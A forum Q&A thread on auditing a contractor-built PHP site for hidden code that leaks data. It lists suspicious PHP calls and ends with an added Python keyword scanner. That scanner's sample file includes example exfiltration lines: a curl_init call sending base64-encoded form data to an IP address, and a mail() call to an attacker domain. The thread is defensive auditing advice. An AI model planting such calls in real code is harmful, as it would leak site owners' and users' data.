Is there a way to verify or check if there is suspicious code in a web site developed in PHP?

Posted on 2011-10-27
Last Modified: 2013-12-25
Where should we look within a web site developed in PHP to find if there is any malicious code leaking information from our site? Besides PHP: Java, CGI, etc.
Question by: rayluvs

    Author Comment

    More info.

    It was a site developed for us and just turned in.  The site is more like a project & proposal site used by us.  We have doubts about one of the programmers from a conversation we overheard.

    We copied the entire site contents from our FTP to our hard drive to make the search for any hidden links or calls outside our site faster.

    Basically what we want to know is what to look for in our code that would show us any connection to other sites, or how to see if our data is being sent to or received from other sites.

    Hope we made our need clear.

    Accepted Solution

    There are many suspicious ways to inject into the website; I have experienced some ways like IFRAME, JavaScript redirects, some encrypted tags, code in between the text and HTML tags...

    You can check, search and verify whether an IFRAME is being injected in the whole page text/content.

    Expert Comment

    by:Loganathan Natarajan
    Also you may consider using some tools to scan the entire website code, so that you can find the details.

    Author Comment

    Can we make a search for keywords that would flag possible bad coding for us?  Since all the files are text, we figure if we search for any keywords and find one, this would raise a black flag.  After we identify all keywords we'll proceed to Google for more info pertaining to the messages that appeared.


    Assisted Solution

    With code, it will most likely require an actual audit of your code to find out if any information is leaked externally.  A simple search will most likely not net good results, as any malicious programmer would make it hard to pattern match.

    Things to keep an eye out for -

    - Code that was not requested (Did you say PHP only?  Do you see code that does not belong?  Unrequested JavaScript?)
    - Extern / system calls - Check what is being executed.  Find out what it is.  If you cannot tell what is being executed, that's a huge red flag.
    - Files & output - Look for any writing to disk.  Are files being saved to a public access area or FTP-accessible areas?  What kind of information is written to these files?
    - IP addresses, URIs - Look for any internet addresses.  Look for decimal-format IP addresses.
    - Obfuscation - Do you see any areas of code that are difficult to read?  These should be scrutinized with a fine-tooth comb.

    What I would strongly suggest (this is what I personally would do, if I were unfamiliar or uncomfortable with a language) is to have a completely unrelated third party audit the code.  I HIGHLY suggest letting someone who knows what they are looking for... look for it.  This is especially vital if you are held to a high security standard, or if you are in a position to face financial loss in case of a data breach (such as: you're a merchant, or have private information to protect).  The initial investment of protecting yourself is a very smart investment.

    Expert Comment

    by:Dave Baldwin
    I agree with @kyanwan: if you don't have the ability to write the code yourself, then you should have someone else audit it.  I know I could put things in PHP and JavaScript that a novice could not find.

    Assisted Solution

    by:Ray Paseur
    If you are able to get him, this fellow is one of the leading experts in PHP security and he will be able to audit the code for you.  Expect to pay $XX,000 plus expenses, but you will get the peace of mind that comes from an ironclad, expert response.

    If you cannot get Chris, you want to make a Google search for "PHP Security" and try to get someone else who is a noted author and speaker.

    The point is, as kyanwan and Dave suggest, that you do not know what you do not know.  Specialized skills and knowledge are required to find the sorts of things that you must find if you want a secure system.  As the noted firefighter Red Adair once said, "If you think it's expensive to hire a professional, just wait until you hire an amateur!"

    Best of luck, ~Ray

    Author Comment

    Thank you very much on this valuable info.

    Regarding contracting a professional to validate our site: it is a great recommendation.  However, the investment is not justified for us for the following reasons:

             - We are not a big firm
             - The contents developed are not complex
             - It is not that security sensitive
             - The total size is not over 3 MB
             - It is not live yet

    What we're looking for is more like the details provided by kyanwan in the first part of ID: 37043207.  

    We are not experts in some tech areas, but with EE assistance we have successfully done a series of tasks that we would not have been able to do before.  This site is Excellent!

    We are not looking for an actual step-by-step "How-To" to detect flaws or leaks, but something like kyanwan's in the first part of ID: 3704320; guidance on where to look.

    For example, when we contract a VB programmer, prior to going live with the apps developed, we look at the code for all connections and external calls to other apps or IPs to make sure that the control stays where we want.  For example the SQL connections, calls to other apps or ASCII files that may input or output data for creating connections, IPs; we even look at functions to see if they create values for accessing other areas (we once found a function using char(x) until it spelled out an actual address), stuff like this.

    On the web, that's what we are trying to do prior to going live.

    A little more info

    The contents are composed of (by file type):

       - Cascading Style Sheet Document (1 file)
       - Icon (16)
       - JS File (3)
       - PNG File (40)
       - JPEG image (1)
       - GIF file (1)
       - HTML Document (1)
       - PHP File (29)

    Can you give some actual names to look for, or logic flow, anything that would help us to just look.  It's not a big app, so we are willing to invest some time.

    Please advise.

    Assisted Solution

    Greetings Ramante, in your post ID: 37045538, you may not need to look at the image files (gif, jpg, png, icon) or the CSS (if there is malicious code in these you are way over your head - my opinion), and you will need to look at the JavaScript, PHP and maybe the HTML.
    First, I see as important what you will do (the action you take, as to the developer and your organization) if you find something that you think "might be" malicious code leaking information, as opposed to "definitely bad" malicious code leaking information, which may have you ask the developer what the code is doing, or just get another developer to do your site again.

    There are so many ways to send info to other places, as in "malicious code leaking information"; for instance you can just connect to a remote database (MySQL, Windows databases, and others) and insert your data into that database, so someone else can use your data without your permission or knowledge.
    There are several ways to connect and send/receive data in PHP and other server-side code bases; there is SOAP -
    $Trans = new SoapClient("");

    Also it is possible to send data to another place just by requesting a page, using a GET:

    $myData = "Secret_Valuable_Information";
    $page = file_get_contents(''.$myData);
    But as has been mentioned, you can mix and match code segments in PHP to "hide" or obfuscate, so that searching for text may not show you much "malicious code".

    Author Comment

    Thanx Slick812, yes something like that.  What we are looking for are keywords, not actual strings.  For example, we finished checking the site content files which are in PHP, Java, CGI, etc. (since they are text) for keywords such as:

       ip values (search for
       " exec("
    Also just finished incorporating your keywords:


    In essence we would like from EE first-hand experience of specific commands in PHP/Java/Ajax/etc. that would either save to files, open paths, save to a database, etc.

    We want to compile and set up some sort of "checklist" of words to look for, and then identify if they are being used correctly in our site.

    What we need are examples of command words.


    Assisted Solution

    By the description of your data that you've given, I've got a feeling that your code is most likely safe.  If your data, by your own recognition, is not that valuable... chances are the programmer will value future work from you more than some seemingly worthless information.


    One other thing - do not ignore the output of your site.  A malicious coder could always take what they want and put it secretly right out in the open to pick up later.  Try to find any blocks of code that seemingly do nothing, or modify page output in minute and inconsistent ways.  (Read more: ; in summary, look for I/O in your code that has no value to your program.  If you find it, take a second and third look at it, no matter how irrelevant it may seem.)

    If you have a block of code that changes output based on variables that you consider your more "critical" information, that should be suspect and checked over.  If you can't think of a good explanation for the code, it's worth more scrutiny.

    For your output, to do some quick detection that's easy and low cost: get a multi-file text editor (like EditPlus, or even Microsoft Word if you copy and paste the code) and open 10-20 different output pages from your site.  Check for inconsistencies in the generated output from page to page.  (A very easy way to do this: just have your captured data all open, flip through your tabs while scrolling down bit by bit, with each page in the same position.)

    Author Comment

    Thanx for the info.

    Since all files that actually do processing within a site are text files, we are searching within them for names or commands that write to or read from other sites.

    To close the question, and besides the keywords we are searching for (see ID: 37050756), can you guys give us any additional names of commands that would do the following:

          - Write to
          - Copy To
          - Read From
          - Commands that would send emails

    Greatly appreciated

    Assisted Solution

    I am posting here just to give a few ideas for PHP methods I can think of that I remember for network (web) transfer of data; the main two (in my mind) would be -
    curl_init(), socket_create()

    some others -
    ldap_connect(), ftp_connect(), ftp_ssl_connect()

    But there are so many ways to do web transfer that I can't think of others right now; of course you could always just send an email with mail()

    You may want to look more closely at the code places that deal with the DATA that you consider valuable, and see if there are any references to web addresses or IP numbers that are not associated with your site.
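    As an added example (my own code, not posted by anyone in this thread), here is a Python script that does the keyword-checklist pass the asker describes, using the call names kyanwan and Slick812 listed (exec/system calls, curl_init, socket_create, ftp_connect, mail and so on) plus URLs to hosts other than your own and literal IP addresses. The watchlist grouping, the own-hosts allowlist and the sample PHP file are all constructed for illustration.

```python
import re
from urllib.parse import urlparse

# My own grouping of the PHP calls named in this thread as worth a second look:
# execution, network transfer, file writes, mail and obfuscation helpers. Extend it.
WATCHLIST = {
    "execution": ["exec", "shell_exec", "system", "passthru", "popen", "proc_open", "eval"],
    "network": ["curl_init", "socket_create", "fsockopen", "ftp_connect", "ftp_ssl_connect",
                "ldap_connect", "SoapClient", "file_get_contents", "fopen"],
    "file-write": ["file_put_contents", "fwrite", "copy", "move_uploaded_file"],
    "mail": ["mail"],
    "obfuscation": ["base64_decode", "gzinflate", "str_rot13", "chr", "create_function"],
}
# PHP function and class names are case-insensitive, so index them lower-cased.
NAME_TO_CATEGORY = {n.lower(): cat for cat, names in WATCHLIST.items() for n in names}
# A bare call or `new Class(`; the lookbehind skips method calls such as $pdo->exec()
# and variables such as $exec, which are not the watchlisted functions.
CALL_RE = re.compile(r"(?<![\w$>])(?:new\s+)?(" + "|".join(map(re.escape, NAME_TO_CATEGORY))
                     + r")\s*\(", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
# Dotted quad with guards so version strings like 1.2.3 or 1.2.3.4.5 do not match.
IPV4_RE = re.compile(r"(?<![\w.])(?:\d{1,3}\.){3}\d{1,3}(?![\w.])")

def scan_php_source(source, own_hosts):
    """Return (line_no, category, evidence) per indicator; own_hosts are not reported."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for m in CALL_RE.finditer(line):
            findings.append((line_no, NAME_TO_CATEGORY[m.group(1).lower()], m.group(0)))
        for m in URL_RE.finditer(line):
            if (urlparse(m.group(0)).hostname or "") not in own_hosts:
                findings.append((line_no, "external-url", m.group(0)))
        for m in IPV4_RE.finditer(line):
            if m.group(0) not in own_hosts:
                findings.append((line_no, "ip-address", m.group(0)))
    return findings

# Constructed sample: a legitimate fetch from the site's own host, a PDO method that shares
# its name with exec(), then three lines of the kind the thread says to look for.
SAMPLE_PHP = r'''<?php
$html = file_get_contents('https://www.example.com/proposals.json');
$pdo->exec("DELETE FROM drafts WHERE id = 3");
$ch = curl_init("http://203.0.113.5/collect.php?d=" . base64_encode($formData));
mail("someone@attacker.invalid", "copy", $formData);
$payload = base64_decode("aGVsbG8=");
'''

if __name__ == "__main__":
    for line_no, category, evidence in scan_php_source(SAMPLE_PHP, {"www.example.com"}):
        print("line %d [%s] %s" % (line_no, category, evidence))
```

    A hit is a place to start reading, not a verdict: as kyanwan and Slick812 say, names assembled at runtime (chr() sequences, concatenation, decoded strings) will not match, which is why the decoding helpers are on the list themselves.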

    Author Comment

    Ok thanks all.  We think we got very valuable info from you guys.
